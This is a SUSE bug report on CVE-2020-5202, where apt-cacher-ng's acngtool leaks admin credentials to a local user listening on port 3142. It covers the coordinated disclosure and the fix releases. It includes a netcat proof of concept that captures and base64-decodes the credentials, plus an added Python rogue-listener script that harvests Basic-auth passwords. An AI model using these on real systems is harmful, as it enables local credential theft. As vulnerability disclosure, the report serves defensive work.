Bug 1157706 - (CVE-2020-5202) VUL-0: CVE-2020-5202: apt-cacher-ng: acngtool uses localhost connection instead of socket by default
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P3 - Medium
Severity: Normal
Assigned To: Security Team bot
Reported: 2019-11-25 15:01 UTC by Matthias Gerstner
Modified: 2020-05-13 08:20 UTC

Description Matthias Gerstner 2019-11-25 15:01:36 UTC
Another finding from bug 1150532. The apt-cacher-ng cron job runs the
`acngtool` like this by default:

```
/usr/lib/apt-cacher-ng/acngtool maint -c /etc/apt-cacher-ng SocketPath=/var/run/apt-cacher-ng/socket
```

It turns out the apt-cacher-ng daemon opens a localhost socket on port 3142 by
default but also a UNIX domain socket in /var/run/apt-cacher-ng/socket.

Even though the SocketPath is explicitly passed to acngtool, the tool prefers
the localhost communication via port 3142. This could allow a local attacker
to bind to port 3142 to setup a fake apt-cacher-ng service that the acngtool
will then talk to. This works when the attacker wins a race against systemd
trying to start the daemon, or if the daemon is simply not enabled at all, or
crashes.

Since apt-cacher-ng also supports credentials and no peer verification is done
by default, the cron job would send those credentials to the unprivileged
local user. Therefore this is a serious information leak.

The bug is coming from the upstream code. I've traced it back to
source/acngtool.cc:503 where the following happens:

```
	auto nips = Tokenize(cfg::bindaddr, SPACECHARS, hostips, true);
	if (!nips)
		hostips.emplace_back("localhost");
```

So if no explicit BindAddr was configured in the config files then localhost is
used. The SocketPath passed on the command line seems to be ignored.

I will need to report this to upstream which I will do tomorrow. Please treat
this as confidential for the moment until I could offer coordinated disclosure
to upstream.
Comment 1 Matthias Gerstner 2019-11-26 14:03:05 UTC
I wrote an email to the upstream maintainer describing the problem. Let's see
what he says. The following is a PoC for the weakness:

```
root # grep AdminAuth /etc/apt-cacher-ng/security.conf
AdminAuth: mooma:moopa

root # systemctl stop apt-cacher-ng

user $ nc -l -p 3142

root # /etc/cron.daily/apt-cacher-ng

GET /acng-report.html?doExpire=Start%2bExpiration&abortOnErrors=aOe HTTP/1.1
User-Agent: Debian Apt-Cacher-NG/2
Host: localhost
Authorization: Basic bW9vbWE6bW9vcGE=
Cache-Control: no-store,no-cache,max-age=0
Accept: application/octet-stream
Accept-Encoding: identity
Connection: close
```

```
user $ echo 'bW9vbWE6bW9vcGE=' | base64 -d
mooma:moopa
```
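Added example (editor's note; this is not code from the bug report, from Debian or from apt-cacher-ng): a Python re-enactment of the attack described in the bug description (an unprivileged user binds port 3142 while the real daemon is absent) and of the credential leak shown in the PoC above. `SAMPLE_REQUEST` is a constructed copy of the request printed in Comment 1; `rogue_listener`, `extract_basic_credentials` and `demo_capture` are names chosen for this example, not acngtool's. `demo_capture` defaults to port 0 (an ephemeral port) so it runs on any host; pass 3142 to stand in for `nc -l -p 3142` on a box where the daemon is stopped.

```python
"""Rogue localhost listener that captures the Basic-auth credentials a client
such as the apt-cacher-ng cron job volunteers when it connects to TCP
127.0.0.1:3142 instead of the UNIX socket it was told to use."""
import base64
import socket
import threading

# Constructed copy of the request acngtool emitted in the PoC (Comment 1).
SAMPLE_REQUEST = (
    b"GET /acng-report.html?doExpire=Start%2bExpiration&abortOnErrors=aOe HTTP/1.1\r\n"
    b"User-Agent: Debian Apt-Cacher-NG/2\r\n"
    b"Host: localhost\r\n"
    b"Authorization: Basic bW9vbWE6bW9vcGE=\r\n"
    b"Cache-Control: no-store,no-cache,max-age=0\r\n"
    b"Accept: application/octet-stream\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def extract_basic_credentials(raw_request: bytes):
    """Return (user, password) from the Basic Authorization header of an
    HTTP/1.x request head, or None if there is no usable Basic header."""
    head, _, _ = raw_request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True)
        except ValueError:                        # binascii.Error is a ValueError
            return None
        user, _, password = decoded.partition(b":")
        return user.decode("utf-8", "replace"), password.decode("utf-8", "replace")
    return None


def read_request_head(conn: socket.socket, limit: int = 65536) -> bytes:
    """Read until the end of the HTTP header block or until the peer closes."""
    buf = b""
    while b"\r\n\r\n" not in buf and len(buf) < limit:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def rogue_listener(host: str, port: int, ready: threading.Event, result: dict) -> None:
    """Bind a port that needs no privilege (3142 > 1023), accept one client,
    record whatever credentials it sends and answer with a harmless 200."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        result["port"] = srv.getsockname()[1]
        ready.set()
        conn, _ = srv.accept()
        with conn:
            raw = read_request_head(conn)
            result["request"] = raw
            result["credentials"] = extract_basic_credentials(raw)
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")


def demo_capture(port: int = 0):
    """Loopback re-enactment of the PoC: the listener plays the attacker's
    `nc -l -p 3142`, the client replays the cron job's request. Returns the
    credentials the listener harvested."""
    ready, result = threading.Event(), {}
    t = threading.Thread(target=rogue_listener,
                         args=("127.0.0.1", port, ready, result), daemon=True)
    t.start()
    ready.wait(5)
    with socket.create_connection(("127.0.0.1", result["port"]), timeout=5) as c:
        c.sendall(SAMPLE_REQUEST)
        c.recv(1024)
    t.join(5)
    return result["credentials"]


if __name__ == "__main__":
    print("captured credentials:", demo_capture())
```

The listener never authenticates itself, which is exactly why the leak works: acngtool does no peer verification, so anything answering on 127.0.0.1:3142 receives the AdminAuth pair. A UNIX socket under /var/run/apt-cacher-ng/ cannot be squatted by a user who cannot write to that directory, which is why honouring the SocketPath given on the command line is the safer behaviour the bug asks for.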
Comment 2 Matthias Gerstner 2019-11-27 14:32:23 UTC
The Debian maintainer responded quickly to my report. He acknowledges the
issue as described in this bug. It seems they will need an embargo period,
because the fix will require more than just a few lines of code. We didn't
agree upon a fixed embargo period yet. I will update when I know more.

Since this is now officially an embargoed bug please don't publish any
information about this issue until the security team lifts the embargo. This
also includes not submitting a bugfix or description of this issue to the OBS.
Thank you!
Comment 3 Matthias Gerstner 2019-12-05 10:53:30 UTC
I've discussed a first patch proposal with Debian upstream. There was no reply
for some days now. The Debian security team also didn't react yet. They will
supposedly assign a DSA (Debian-Security-Advisory) and CVE on their end. When
a final patch is agreed upon I will share it in this bug.
Comment 4 Matthias Gerstner 2020-01-15 13:09:20 UTC
So Debian upstream somehow made an uncoordinated release of this security
bugfix. Basically the CVE and the related information is already public [1].
Not everything is finished yet on Debian side but since the information is
public we can publish ourselves just as well.

I will take care of this bug since no maintainer could be found so far.

Since the package is in such a bad state the proactive security team agreed to
do the following:

- file a delete request for apt-cacher-ng in Factory.
- submit a maintenance update for apt-cacher-ng in maintained Leap versions
  that fixes the issues the best we can.

[1]: https://security-tracker.debian.org/tracker/CVE-2020-5202
Comment 5 Swamp Workflow Management 2020-01-20 14:20:14 UTC
This is an autogenerated message for OBS integration:
This bug (1157706) was mentioned in
https://build.opensuse.org/request/show/765843 15.1 / apt-cacher-ng
Comment 6 Matthias Gerstner 2020-01-21 09:36:23 UTC
I published this on oss-sec [1]. I also added the post as a public reference
to the CVE via the Mitre web form, such that Mitre published the CVE in their
database.

[1]: https://seclists.org/oss-sec/2020/q1/21
Comment 7 Swamp Workflow Management 2020-01-29 11:15:07 UTC
openSUSE-SU-2020:0124-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1157703,1157706
CVE References: CVE-2019-18899,CVE-2020-5202
Sources used:
openSUSE Leap 15.1 (src):    apt-cacher-ng-3.1-lp151.3.3.1
Comment 8 Swamp Workflow Management 2020-01-29 20:41:29 UTC
openSUSE-SU-2020:0146-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1157703,1157706
CVE References: CVE-2019-18899,CVE-2020-5202
Sources used:
openSUSE Backports SLE-15-SP1 (src):    apt-cacher-ng-3.1-bp151.4.3.1
Comment 9 Matthias Gerstner 2020-05-13 08:13:57 UTC
reassigning to security-team, this should be done by now
Comment 10 Alexandros Toptsoglou 2020-05-13 08:20:49 UTC
Done